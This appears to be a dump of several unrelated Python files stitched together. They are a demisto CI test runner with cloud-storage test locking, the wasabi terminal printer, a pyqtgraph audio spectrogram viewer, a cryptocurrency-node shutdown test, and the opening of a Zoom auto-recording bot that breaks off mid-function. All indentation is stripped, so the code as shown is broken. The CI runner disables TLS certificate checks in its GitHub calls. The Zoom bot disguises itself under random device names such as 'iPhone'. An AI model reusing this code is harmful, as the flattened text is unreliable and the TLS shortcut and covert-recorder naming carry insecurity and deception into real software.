thread_index=0, is_ami=False)
elif tests_settings.isAMI:
# Running tests in AMI configuration.
# This is the way we run most tests, including running Circle for PRs and nightly.
if is_nightly:
# If the build is a nightly build, run tests in parallel.
test_allocation = get_tests_allocation_for_threads(number_of_instances, tests_settings.conf_path)
current_thread_index = 0
all_unmockable_tests_list = get_unmockable_tests(tests_settings)
threads_array = []
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion: # Only run tests for given AMI Role
current_instance = ami_instance_ip
tests_allocation_for_instance = test_allocation[current_thread_index]
unmockable_tests = [test for test in all_unmockable_tests_list
if test in tests_allocation_for_instance]
mockable_tests = [test for test in tests_allocation_for_instance if test not in unmockable_tests]
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
if number_of_instances == 1:
execute_testing(tests_settings, current_instance, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
else:
thread_kwargs = {
"tests_settings": tests_settings,
"server_ip": current_instance,
"mockable_tests_names": mockable_tests,
"unmockable_tests_names": unmockable_tests,
"thread_index": current_thread_index,
"prints_manager": prints_manager,
"tests_data_keeper": tests_data_keeper,
}
t = threading.Thread(target=execute_testing, kwargs=thread_kwargs)
threads_array.append(t)
t.start()
current_thread_index += 1
for t in threads_array:
t.join()
else:
for ami_instance_name, ami_instance_ip in instances_ips:
if ami_instance_name == tests_settings.serverVersion:
print_color("Starting tests for {}".format(ami_instance_name), LOG_COLORS.GREEN)
print("Starts tests with server url - https://{}".format(ami_instance_ip))
all_tests = get_all_tests(tests_settings)
unmockable_tests = get_unmockable_tests(tests_settings)
mockable_tests = [test for test in all_tests if test not in unmockable_tests]
execute_testing(tests_settings, ami_instance_ip, mockable_tests, unmockable_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=True)
sleep(8)
else:
# TODO: understand better when this occurs and what will be the settings
# This case is rare, and usually occurs on two cases:
# 1. When someone from Server wants to trigger a content build on their branch.
# 2. When someone from content wants to run tests on a specific build.
server_numeric_version = '99.99.98' # assume latest
print("Using server version: {} (assuming latest for non-ami)".format(server_numeric_version))
instance_ip = instances_ips[0][1]
all_tests = get_all_tests(tests_settings)
execute_testing(tests_settings, instance_ip, [], all_tests,
tests_data_keeper, prints_manager, thread_index=0, is_ami=False)
print_test_summary(tests_data_keeper, tests_settings.isAMI)
create_result_files(tests_data_keeper)
if tests_data_keeper.failed_playbooks:
tests_failed_msg = "Some tests have failed. Not destroying instances."
print(tests_failed_msg)
sys.exit(1)
else:
file_path = "./Tests/is_build_passed_{}.txt".format(tests_settings.serverVersion.replace(' ', ''))
with open(file_path, "w") as is_build_passed_file:
is_build_passed_file.write('Build passed')
def add_pr_comment(comment):
token = os.environ['CONTENT_GITHUB_TOKEN']
branch_name = os.environ['CIRCLE_BRANCH']
sha1 = os.environ['CIRCLE_SHA1']
query = '?q={}+repo:demisto/content+org:demisto+is:pr+is:open+head:{}+is:open'.format(sha1, branch_name)
url = 'https://api.github.com/search/issues'
headers = {'Authorization': 'Bearer ' + token}
try:
res = requests.get(url + query, headers=headers, verify=False)
res = handle_github_response(res)
if res and res.get('total_count', 0) == 1:
issue_url = res['items'][0].get('comments_url') if res.get('items', []) else None
if issue_url:
res = requests.post(issue_url, json={'body': comment}, headers=headers, verify=False)
handle_github_response(res)
else:
print_warning('Add pull request comment failed: There is more then one open pull request for branch {}.'
.format(branch_name))
except Exception as e:
print_warning('Add pull request comment failed: {}'.format(e))
def handle_github_response(response):
res_dict = response.json()
if not res_dict.ok:
print_warning('Add pull request comment failed: {}'.
format(res_dict.get('message')))
return res_dict
@contextmanager
def acquire_test_lock(integrations_details: list,
test_timeout: int,
prints_manager: ParallelPrintsManager,
thread_index: int,
conf_json_path: str) -> None:
"""
This is a context manager that handles all the locking and unlocking of integrations.
Execution is as following:
* Attempts to lock the test's integrations and yields the result of this attempt
* If lock attempt has failed - yields False, if it succeeds - yields True
* Once the test is done- will unlock all integrations
Args:
integrations_details: test integrations details
test_timeout: test timeout in seconds
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Yields:
A boolean indicating the lock attempt result
"""
locked = safe_lock_integrations(test_timeout,
prints_manager,
integrations_details,
thread_index,
conf_json_path)
try:
yield locked
finally:
if not locked:
return
safe_unlock_integrations(prints_manager, integrations_details, thread_index)
prints_manager.execute_thread_prints(thread_index)
def safe_unlock_integrations(prints_manager: ParallelPrintsManager, integrations_details: list, thread_index: int):
"""
This integration safely unlocks the test's integrations.
If an unexpected error occurs - this method will log it's details and other tests execution will continue
Args:
prints_manager: ParallelPrintsManager object
integrations_details: Details of the currently executed test
thread_index: The index of the thread that executes the unlocking
"""
try:
# executing the test could take a while, re-instancing the storage client
storage_client = storage.Client()
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to unlock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
def safe_lock_integrations(test_timeout: int,
prints_manager: ParallelPrintsManager,
integrations_details: list,
thread_index: int,
conf_json_path: str) -> bool:
"""
This integration safely locks the test's integrations and return it's result
If an unexpected error occurs - this method will log it's details and return False
Args:
test_timeout: Test timeout in seconds
prints_manager: ParallelPrintsManager object
integrations_details: test integrations details
thread_index: The index of the thread that executes the unlocking
conf_json_path: Path to conf.json file
Returns:
A boolean indicating the lock attempt result
"""
conf, _ = load_conf_files(conf_json_path, None)
parallel_integrations_names = conf['parallel_integrations']
filtered_integrations_details = [integration for integration in integrations_details if
integration['name'] not in parallel_integrations_names]
integration_names = get_integrations_list(filtered_integrations_details)
if integration_names:
print_msg = f'Attempting to lock integrations {integration_names}, with timeout {test_timeout}'
else:
print_msg = 'No integrations to lock'
prints_manager.add_print_job(print_msg, print, thread_index, include_timestamp=True)
try:
storage_client = storage.Client()
locked = lock_integrations(filtered_integrations_details, test_timeout, storage_client, prints_manager, thread_index)
except Exception as e:
prints_manager.add_print_job(f'attempt to lock integration failed for unknown reason.\nError: {e}',
print_warning,
thread_index,
include_timestamp=True)
locked = False
return locked
def workflow_still_running(workflow_id: str) -> bool:
"""
This method takes a workflow id and checks if the workflow is still running
If given workflow ID is the same as the current workflow, will simply return True
else it will query circleci api for the workflow and return the status
Args:
workflow_id: The ID of the workflow
Returns:
True if the workflow is running, else False
"""
# If this is the current workflow_id
if workflow_id == WORKFLOW_ID:
return True
else:
try:
workflow_details_response = requests.get(f'https://circleci.com/api/v2/workflow/{workflow_id}',
headers={'Accept': 'application/json'},
auth=(CIRCLE_STATUS_TOKEN, ''))
workflow_details_response.raise_for_status()
except Exception as e:
print(f'Failed to get circleci response about workflow with id {workflow_id}, error is: {e}')
return True
return workflow_details_response.json().get('status') not in ('canceled', 'success', 'failed')
def lock_integrations(integrations_details: list,
test_timeout: int,
storage_client: storage.Client,
prints_manager: ParallelPrintsManager,
thread_index: int) -> bool:
"""
Locks all the test's integrations
Args:
integrations_details: List of current test's integrations
test_timeout: Test timeout in seconds
storage_client: The GCP storage client
prints_manager: ParallelPrintsManager object
thread_index: The index of the thread that executes the unlocking
Returns:
True if all the test's integrations were successfully locked, else False
"""
integrations = get_integrations_list(integrations_details)
if not integrations:
return True
existing_integrations_lock_files = get_locked_integrations(integrations, storage_client)
for integration, lock_file in existing_integrations_lock_files.items():
# Each file has content in the form of <circleci-build-number>:<timeout in seconds>
# If it has not expired - it means the integration is currently locked by another test.
workflow_id, build_number, lock_timeout = lock_file.download_as_string().decode().split(':')
if not lock_expired(lock_file, lock_timeout) and workflow_still_running(workflow_id):
# there is a locked integration for which the lock is not expired - test cannot be executed at the moment
prints_manager.add_print_job(
f'Could not lock integration {integration}, another lock file was exist with '
f'build number: {build_number}, timeout: {lock_timeout}, last update at {lock_file.updated}.\n'
f'Delaying test execution',
print,
thread_index,
include_timestamp=True)
return False
integrations_generation_number = {}
# Gathering generation number with which the new file will be created,
# See https://cloud.google.com/storage/docs/generations-preconditions for details.
for integration in integrations:
if integration in existing_integrations_lock_files:
integrations_generation_number[integration] = existing_integrations_lock_files[integration].generation
else:
integrations_generation_number[integration] = 0
return create_lock_files(integrations_generation_number, prints_manager,
storage_client, integrations_details, test_timeout, thread_index)
def get_integrations_list(test_integrations: list) -> list:
"""
Since test details can have one integration as a string and sometimes a list of integrations- this methods
parses the test's integrations into a list of integration names.
Args:
test_integrations: List of current test's integrations
Returns:
the integration names in a list for all the integrations that takes place in the test
specified in test details.
"""
return [integration['name'] for integration in test_integrations]
def create_lock_files(integrations_generation_number: dict,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
integrations_details: list,
test_timeout: int,
thread_index: int) -> bool:
"""
This method tries to create a lock files for all integrations specified in 'integrations_generation_number'.
Each file should contain <circle-ci-build-number>:<test-timeout>
where the <circle-ci-build-number> part is for debugging and troubleshooting
and the <test-timeout> part is to be able to unlock revoked test files.
If for any of the integrations, the lock file creation will fail- the already created files will be cleaned.
Args:
integrations_generation_number: A dict in the form of {<integration-name>:<integration-generation>}
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
integrations_details: List of current test's integrations
test_timeout: The time out
thread_index:
Returns:
"""
locked_integrations = []
bucket = storage_client.bucket(BUCKET_NAME)
for integration, generation_number in integrations_generation_number.items():
blob = bucket.blob(f'{LOCKS_PATH}/{integration}')
try:
blob.upload_from_string(f'{WORKFLOW_ID}:{CIRCLE_BUILD_NUM}:{test_timeout + 30}',
if_generation_match=generation_number)
prints_manager.add_print_job(f'integration {integration} locked',
print,
thread_index,
include_timestamp=True)
locked_integrations.append(integration)
except PreconditionFailed:
# if this exception occurs it means that another build has locked this integration
# before this build managed to do it.
# we need to unlock all the integrations we have already locked and try again later
prints_manager.add_print_job(
f'Could not lock integration {integration}, Create file with precondition failed.'
f'delaying test execution.',
print_warning,
thread_index,
include_timestamp=True)
unlock_integrations(integrations_details, prints_manager, storage_client, thread_index)
return False
return True
def unlock_integrations(integrations_details: list,
prints_manager: ParallelPrintsManager,
storage_client: storage.Client,
thread_index: int) -> None:
"""
Delete all integration lock files for integrations specified in 'locked_integrations'
Args:
integrations_details: List of current test's integrations
prints_manager: ParallelPrintsManager object
storage_client: The GCP storage client
thread_index: The index of the thread that executes the unlocking
"""
locked_integrations = get_integrations_list(integrations_details)
locked_integration_blobs = get_locked_integrations(locked_integrations, storage_client)
for integration, lock_file in locked_integration_blobs.items():
try:
# Verifying build number is the same as current build number to avoid deleting other tests lock files
_, build_number, _ = lock_file.download_as_string().decode().split(':')
if build_number == CIRCLE_BUILD_NUM:
lock_file.delete(if_generation_match=lock_file.generation)
prints_manager.add_print_job(
f'Integration {integration} unlocked',
print,
thread_index,
include_timestamp=True)
except PreconditionFailed:
prints_manager.add_print_job(f'Could not unlock integration {integration} precondition failure',
print_warning,
thread_index,
include_timestamp=True)
def get_locked_integrations(integrations: list, storage_client: storage.Client) -> dict:
"""
Getting all locked integrations files
Args:
integrations: Integrations that we want to get lock files for
storage_client: The GCP storage client
Returns:
A dict of the form {<integration-name>:<integration-blob-object>} for all integrations that has a blob object.
"""
# Listing all files in lock folder
# Wrapping in 'list' operator because list_blobs return a generator which can only be iterated once
lock_files_ls = list(storage_client.list_blobs(BUCKET_NAME, prefix=f'{LOCKS_PATH}'))
current_integrations_lock_files = {}
# Getting all existing files details for integrations that we want to lock
for integration in integrations:
current_integrations_lock_files.update({integration: [lock_file_blob for lock_file_blob in lock_files_ls if
lock_file_blob.name == f'{LOCKS_PATH}/{integration}']})
# Filtering 'current_integrations_lock_files' from integrations with no files
current_integrations_lock_files = {integration: blob_files[0] for integration, blob_files in
current_integrations_lock_files.items() if blob_files}
return current_integrations_lock_files
def lock_expired(lock_file: storage.Blob, lock_timeout: str) -> bool:
"""
Checks if the time that passed since the creation of the 'lock_file' is more then 'lock_timeout'.
If not- it means that the integration represented by the lock file is currently locked and is tested in another build
Args:
lock_file: The lock file blob object
lock_timeout: The expiration timeout of the lock in seconds
Returns:
True if the lock has expired it's timeout, else False
"""
return datetime.datetime.now(tz=pytz.utc) - lock_file.updated >= datetime.timedelta(seconds=int(lock_timeout))
def main():
print("Time is: {}\n\n\n".format(datetime.datetime.now()))
tests_settings = options_handler()
# should be removed after solving: https://github.com/demisto/etc/issues/21383
# -------------
if 'master' in tests_settings.serverVersion.lower():
print('[{}] sleeping for 30 secs'.format(datetime.datetime.now()))
sleep(45)
# -------------
manage_tests(tests_settings)
if __name__ == '__main__':
main()
|
printer.py
|
# coding: utf8
from __future__ import unicode_literals, print_function
import datetime
from collections import Counter
from contextlib import contextmanager
from multiprocessing import Process
import itertools
import sys
import time
import os
import traceback
from .tables import table, row
from .util import wrap, supports_ansi, can_render, locale_escape
from .util import MESSAGES, COLORS, ICONS
from .util import color as _color
class Printer(object):
def __init__(
self,
pretty=True,
no_print=False,
colors=None,
icons=None,
line_max=80,
animation="⠙⠹⠸⠼⠴⠦⠧⠇⠏",
animation_ascii="|/-\\",
hide_animation=False,
ignore_warnings=False,
env_prefix="WASABI",
timestamp=False,
):
"""Initialize the command-line printer.
pretty (bool): Pretty-print output (colors, icons).
no_print (bool): Don't actually print, just return.
colors (dict): Add or overwrite color values, name mapped to value.
icons (dict): Add or overwrite icons. Name mapped to unicode icon.
line_max (int): Maximum line length (for divider).
animation (unicode): Steps of loading animation for loading() method.
animation_ascii (unicode): Alternative animation for ASCII terminals.
hide_animation (bool): Don't display animation, e.g. for logs.
ignore_warnings (bool): Do not output messages of type MESSAGE.WARN.
env_prefix (unicode): Prefix for environment variables, e.g.
WASABI_LOG_FRIENDLY.
timestamp (bool): Print a timestamp (default False).
RETURNS (Printer): The initialized printer.
"""
env_log_friendly = os.getenv("{}_LOG_FRIENDLY".format(env_prefix), False)
env_no_pretty = os.getenv("{}_NO_PRETTY".format(env_prefix), False)
self._counts = Counter()
self.pretty = pretty and not env_no_pretty
self.no_print = no_print
self.show_color = supports_ansi() and not env_log_friendly
self.hide_animation = hide_animation or env_log_friendly
self.ignore_warnings = ignore_warnings
self.line_max = line_max
self.colors = dict(COLORS)
self.icons = dict(ICONS)
self.timestamp = timestamp
if colors:
self.colors.update(colors)
if icons:
self.icons.update(icons)
self.anim = animation if can_render(animation) else animation_ascii
@property
def counts(self):
"""Get the counts of how often the special printers were fired,
e.g. MESSAGES.GOOD. Can be used to print an overview like "X warnings".
"""
return self._counts
def good(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a success message."""
return self._get_msg(
title, text, style=MESSAGES.GOOD, show=show, spaced=spaced, exits=exits
)
def fail(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an error message."""
return self._get_msg(
title, text, style=MESSAGES.FAIL, show=show, spaced=spaced, exits=exits
)
def warn(self, title="", text="", show=True, spaced=False, exits=None):
"""Print a warning message."""
return self._get_msg(
title, text, style=MESSAGES.WARN, show=show, spaced=spaced, exits=exits
)
def info(self, title="", text="", show=True, spaced=False, exits=None):
"""Print an informational message."""
return self._get_msg(
title, text, style=MESSAGES.INFO, show=show, spaced=spaced, exits=exits
)
def text(
self,
title="",
text="",
color=None,
icon=None,
spaced=False,
show=True,
no_print=False,
exits=None,
):
"""Print a message.
title (unicode): The main text to print.
text (unicode): Optional additional text to print.
color (unicode / int): Foreground color.
icon (unicode): Name of icon to add.
spaced (unicode): Whether to add newlines around the output.
show (bool): Whether to print or not. Can be used to only output
messages under certain condition, e.g. if --verbose flag is set.
no_print (bool): Don't actually print, just return.
exits (int): Perform a system exit.
"""
if not show:
return
if self.pretty:
color = self.colors.get(color)
icon = self.icons.get(icon)
if icon:
title = locale_escape("{} {}".format(icon, title)).strip()
if self.show_color:
title = _color(title, fg=color)
title = wrap(title, indent=0)
if text:
title = "{}\n{}".format(title, wrap(text, indent=0))
if self.timestamp:
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
title = "{}\t{}".format(now, title)
if exits is not None or spaced:
title = "\n{}\n".format(title)
if not self.no_print and not no_print:
print(title)
if exits is not None:
sys.stdout.flush()
sys.stderr.flush()
if self.no_print or no_print and exits != 0:
try:
raise RuntimeError(title.strip())
except Exception as e:
# Remove wasabi from the traceback and re-raise
tb = "\n".join(traceback.format_stack()[:-3])
raise SystemExit("{}\n{}".format(tb, e))
sys.exit(exits)
if self.no_print or no_print:
return title
def divider(self, text="", char="=", show=True, icon=None):
"""Print a divider with a headline:
============================ Headline here ===========================
text (unicode): Headline text. If empty, only the line is printed.
char (unicode): Line character to repeat, e.g. =.
show (bool): Whether to print or not.
icon (unicode): Optional icon to display with title.
"""
if len(char) != 1:
raise ValueError(
"Divider chars need to be one character long. "
"Received: {}".format(char)
)
if self.pretty:
icon = self.icons.get(icon)
if icon:
text = locale_escape("{} {}".format(icon, text)).strip()
deco = char * (int(round((self.line_max - len(text))) / 2) - 2)
text = " {} ".format(text) if text else ""
text = _color(
"\n{deco}{text}{deco}".format(deco=deco, text=text), bold=True
)
if len(text) < self.line_max:
text = text + char * (self.line_max - len(text))
if self.no_print:
return text
print(text)
def table(self, data, **kwargs):
"""Print data as a table.
data (iterable / dict): The data to render. Either a list of lists
(one per row) or a dict for two-column tables.
kwargs: Table settings. See tables.table for details.
"""
title = kwargs.pop("title", None)
text = table(data, **kwargs)
if title:
self.divider(title)
if self.no_print:
return text
print(text)
def row(self, data, **kwargs):
"""Print a table row.
data (iterable): The individual columns to format.
kwargs: Row settings. See tables.row for details.
"""
text = row(data, **kwargs)
if self.no_print:
return text
print(text)
@contextmanager
def loading(self, text="Loading..."):
if self.no_print:
yield
elif self.hide_animation:
print(text)
yield
else:
sys.stdout.flush()
t = Process(target=self._spinner, args=(text,))
t.start()
try:
yield
except Exception as e:
# Handle exception inside the with block
t.terminate()
sys.stdout.write("\n")
raise (e)
t.terminate()
sys.stdout.write("\r\x1b[2K") # erase line
sys.stdout.flush()
def _spinner(self, text="Loading..."):
for char in itertools.cycle(self.anim):
sys.stdout.write("\r{} {}".format(char, text))
sys.stdout.flush()
time.sleep(0.1)
def _get_msg(self, title, text, style=None, show=None, spaced=False, exits=None):
if self.ignore_warnings and style == MESSAGES.WARN:
show = False
self._counts[style] += 1
return self.text(
title, text, color=style, icon=style, show=show, spaced=spaced, exits=exits
)
|
continuousStream.py
|
import pyqtgraph as pg
from pyqtgraph.Qt import QtCore, QtGui
import numpy as np
from multiprocessing import Process
import time
import constants
class ContinousStream:
# Displays continous stream by buffering <samplesBuffered> samples
def __init__(self, q, secToDisp, SAMPLING_FREQ, graphUpdateFreq):
# Process in which the ploting runs
self.process = Process(target=self.run)
# Data queue
self.q = q
# Audio sampling frequency
self.SAMPLING_FREQ = SAMPLING_FREQ
# Buffer length
self.storedSamp = secToDisp * SAMPLING_FREQ
self.ybuffer = np.zeros(self.storedSamp, dtype=np.uint16)
# Update frequency of the plot
self.graphUpdateFreq = graphUpdateFreq
# Number of seconds of data displayed
self.xdata = np.arange(-secToDisp, 0, 1. / SAMPLING_FREQ)
self.ydata = np.full(self.xdata.size, constants.AUDIO_MEAN, dtype=np.uint16)
self.ptr = 0
# Number of samples used for computing the Spectrogram
self.sampToSpec = 1024
self.timer = pg.QtCore.QTimer()
self.app = QtGui.QApplication([])
self.app.aboutToQuit.connect(self.cleanUp)
self.win = pg.GraphicsWindow()
def cleanUp(self):
# Stops QT timer
self.timer.stop()
# Closes app
self.win.close()
self.app.closeAllWindows()
print('Window closed')
def start(self):
self.process.start()
def run(self):
self.win.setWindowTitle('Microphone data')
# Sound wave plot
plot = self.win.addPlot()
plot.setLabel('bottom', 'Time', 's')
plot.setLabel('left', 'Amplitude', '')
plot.showGrid(x=True, y=True)
self.curve = plot.plot(x=self.xdata, y=self.ydata, pen=(255,0,0))
# Next row
self.win.nextRow()
# Spectrogram plot
self.specImg = pg.ImageItem()
specPlot = self.win.addPlot()
specPlot.addItem(self.specImg)
self.imgArray = np.zeros((1000, self.sampToSpec/2+1))
# Bipolar colormap
pos = np.array([0., 1., 0.5, 0.25, 0.75])
color = np.array([[0,255,255,255], [255,255,0,255], [0,0,0,255], (0, 0, 255, 255), (255, 0, 0, 255)], dtype=np.ubyte)
cmap = pg.ColorMap(pos, color)
lut = cmap.getLookupTable(0.0, 1.0, 256)
# Set colormap
self.specImg.setLookupTable(lut)
self.specImg.setLevels([-50,40])
# Setup the correct scaling for y-axis
freq = np.arange((self.sampToSpec/2)+1)/(float(self.sampToSpec)/self.SAMPLING_FREQ)
yscale = 1.0/(self.imgArray.shape[1]/freq[-1])
self.specImg.scale((1./self.SAMPLING_FREQ)*self.sampToSpec, yscale)
specPlot.setLabel('left', 'Frequency', units='Hz')
self.wind = np.hanning(self.sampToSpec)
self.timer.timeout.connect(self.update)
# Timer init
self.timer.start(1./self.graphUpdateFreq * 1000)
self.app.exec_()
def update(self):
ptrOld = self.ptr
# Gets samples from queue
while not self.q.empty():
sampleVec = self.q.get()
if sampleVec.size == 19:
self.ybuffer[(self.ptr - ptrOld):(self.ptr - ptrOld + 19)] = sampleVec
self.ptr += 19
# Rolls vector
self.ydata = np.roll(self.ydata, -(self.ptr - ptrOld))
# Copies samples to the ploted vector
self.ydata[self.storedSamp - (self.ptr - ptrOld):] = self.ybuffer[:(self.ptr - ptrOld)]
# Plots data
self.curve.setData(x=self.xdata, y=self.ydata)
# Chunk used in Spectrogram
chunk = self.ydata[(self.storedSamp-self.sampToSpec):]
spec = np.fft.rfft(chunk*self.wind) / self.sampToSpec
# Get magnitude
psd = abs(spec)
# Convert to dB scale
psd = 20 * np.log10(psd)
# Roll down image array
self.imgArray = np.roll(self.imgArray, -1, 0)
self.imgArray[-1:] = psd
# Sets image
self.specImg.setImage(self.imgArray, autoLevels=False)
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Copyright (c) 2017-2019 The Raven Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test redecoind shutdown."""
from threading import Thread
from test_framework.test_framework import redecoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy, wait_until
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(redecoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coverage_dir=self.nodes[0].coverage_dir)
# Force connection establishment by executing a dummy command.
node.getblockcount()
Thread(target=test_long_call, args=(node,)).start()
# Wait until the server is executing the above `waitfornewblock`.
wait_until(lambda: len(self.nodes[0].getrpcinfo()['active_commands']) == 2, err_msg="wait until getrpcinfo active commands")
# Wait 1 second after requesting shutdown but not before the `stop` call
# finishes. This is to ensure event loop waits for current connections
# to close.
self.stop_node(0) #, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
zoomrec.py
|
import csv
import logging
import os
import psutil
import pyautogui
import random
import schedule
import signal
import subprocess
import threading
import time
import atexit
import requests
from datetime import datetime, timedelta
global ONGOING_MEETING
global VIDEO_PANEL_HIDED
global TELEGRAM_TOKEN
global TELEGRAM_RETRIES
global TELEGRAM_CHAT_ID
logging.basicConfig(
format='%(asctime)s %(levelname)s %(message)s', level=logging.INFO)
# Turn DEBUG on:
# - screenshot on error
# - record joining
# - do not exit container on error
DEBUG = True if os.getenv('DEBUG') == 'True' else False
# Disable failsafe
pyautogui.FAILSAFE = False
# Get vars
BASE_PATH = os.getenv('HOME')
CSV_PATH = os.path.join(BASE_PATH, "meetings.csv")
IMG_PATH = os.path.join(BASE_PATH, "img")
REC_PATH = os.path.join(BASE_PATH, "recordings")
AUDIO_PATH = os.path.join(BASE_PATH, "audio")
DEBUG_PATH = os.path.join(REC_PATH, "screenshots")
TELEGRAM_TOKEN = os.getenv('TELEGRAM_BOT_TOKEN')
TELEGRAM_CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')
TELEGRAM_RETRIES = 5
DISPLAY_NAME = os.getenv('DISPLAY_NAME')
if DISPLAY_NAME is None or len(DISPLAY_NAME) < 3:
NAME_LIST = [
'iPhone',
'iPad',
'Macbook',
'Desktop',
'Huawei',
'Mobile',
'PC',
'Windows',
'Home',
'MyPC',
'Computer',
'Android'
]
DISPLAY_NAME = random.choice(NAME_LIST)
TIME_FORMAT = "%Y-%m-%d_%H-%M-%S"
CSV_DELIMITER = ';'
ONGOING_MEETING = False
VIDEO_PANEL_HIDED = False
class BackgroundThread:
def __init__(self, interval=10):
# Sleep interval between
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global ONGOING_MEETING
ONGOING_MEETING = True
logging.debug("Check continuously if meeting has ended..")
while ONGOING_MEETING:
# Check if recording
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'meeting_is_being_recorded.png'), confidence=0.9,
minSearchTime=2) is not None):
logging.info("This meeting is being recorded..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'got_it.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Accepted recording..")
except TypeError:
logging.error("Could not accept recording!")
# Check if ended
if (pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'meeting_ended_by_host_1.png'),
confidence=0.9) is not None or pyautogui.locateOnScreen(
os.path.join(IMG_PATH, 'meeting_ended_by_host_2.png'), confidence=0.9) is not None):
ONGOING_MEETING = False
logging.info("Meeting ended by host..")
time.sleep(self.interval)
class HideViewOptionsThread:
def __init__(self, interval=10):
# Sleep interval between
self.interval = interval
thread = threading.Thread(target=self.run, args=())
thread.daemon = True # Daemonize thread
thread.start() # Start the execution
def run(self):
global VIDEO_PANEL_HIDED
logging.debug("Check continuously if screensharing is active..")
while ONGOING_MEETING:
# Check if host is sharing poll results
if (pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'host_is_sharing_poll_results.png'),
confidence=0.9,
minSearchTime=2) is not None):
logging.info("Host is sharing poll results..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'host_is_sharing_poll_results.png'), confidence=0.9)
pyautogui.click(x, y)
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'exit.png'), confidence=0.9)
pyautogui.click(x, y)
logging.info("Closed poll results window..")
except TypeError:
logging.error("Could not exit poll results window!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_close_poll_results_error.png")
except TypeError:
logging.error("Could not find poll results window anymore!")
if DEBUG:
pyautogui.screenshot(os.path.join(DEBUG_PATH, time.strftime(
TIME_FORMAT) + "-" + description) + "_find_poll_results_error.png")
# Check if view options available
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'view_options.png'), confidence=0.9) is not None:
if not VIDEO_PANEL_HIDED:
logging.info("Screensharing active..")
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'view_options.png'), confidence=0.9)
pyautogui.click(x, y)
time.sleep(1)
# Hide video panel
if pyautogui.locateOnScreen(os.path.join(IMG_PATH, 'show_video_panel.png'),
confidence=0.9) is not None:
# Leave 'Show video panel' and move mouse from screen
pyautogui.moveTo(0, 0)
pyautogui.click(0, 0)
VIDEO_PANEL_HIDED = True
else:
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'hide_video_panel.png'), confidence=0.9)
pyautogui.click(x, y)
# Move mouse from screen
pyautogui.moveTo(0, 0)
VIDEO_PANEL_HIDED = True
except TypeError:
logging.error("Could not hide video panel!")
except TypeError:
logging.error("Could not find view options!")
else:
VIDEO_PANEL_HIDED = False
time.sleep(self.interval)
def send_telegram_message(text):
global TELEGRAM_TOKEN
global TELEGRAM_CHAT_ID
global TELEGRAM_RETRIES
if TELEGRAM_TOKEN is None:
logging.error("Telegram token is missing. No Telegram messages will be send!")
return
if TELEGRAM_CHAT_ID is None:
logging.error("Telegram chat_id is missing. No Telegram messages will be send!")
return
if len(TELEGRAM_TOKEN) < 3 or len(TELEGRAM_CHAT_ID) < 3:
logging.error("Telegram token or chat_id missing. No Telegram messages will be send!")
return
url_req = "https://api.telegram.org/bot" + TELEGRAM_TOKEN + "/sendMessage" + "?chat_id=" + TELEGRAM_CHAT_ID + "&text=" + text
tries = 0
done = False
while not done:
results = requests.get(url_req)
results = results.json()
done = 'ok' in results and results['ok']
tries+=1
if not done and tries < TELEGRAM_RETRIES:
logging.error("Sending Telegram message failed, retring in 5 seconds...")
time.sleep(5)
if not done and tries >= TELEGRAM_RETRIES:
logging.error("Sending Telegram message failed {} times, please check your credentials!".format(tries))
done = True
def check_connecting(zoom_pid, start_date, duration):
# Check if connecting
check_periods = 0
connecting = False
# Check if connecting
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is not None:
connecting = True
logging.info("Connecting..")
# Wait while connecting
# Exit when meeting ends after time
while connecting:
if (datetime.now() - start_date).total_seconds() > duration:
logging.info("Meeting ended after time!")
logging.info("Exit Zoom!")
os.killpg(os.getpgid(zoom_pid), signal.SIGQUIT)
return
if pyautogui.locateCenterOnScreen(os.path.join(IMG_PATH, 'connecting.png'), confidence=0.9) is None:
logging.info("Maybe not connecting anymore..")
check_periods += 1
if check_periods >= 2:
connecting = False
logging.info("Not connecting anymore..")
return
time.sleep(2)
def join_meeting_id(meet_id):
logging.info("Join a meeting by ID..")
found_join_meeting = False
try:
x, y = pyautogui.locateCenterOnScreen(os.path.join(
IMG_PATH, 'join_meeting.png'), minSearchTime=2, confidence=0.9)
pyautogui.click(x, y)
found_join_meeting = True
except TypeError:
pass
if not found_join_meeting:
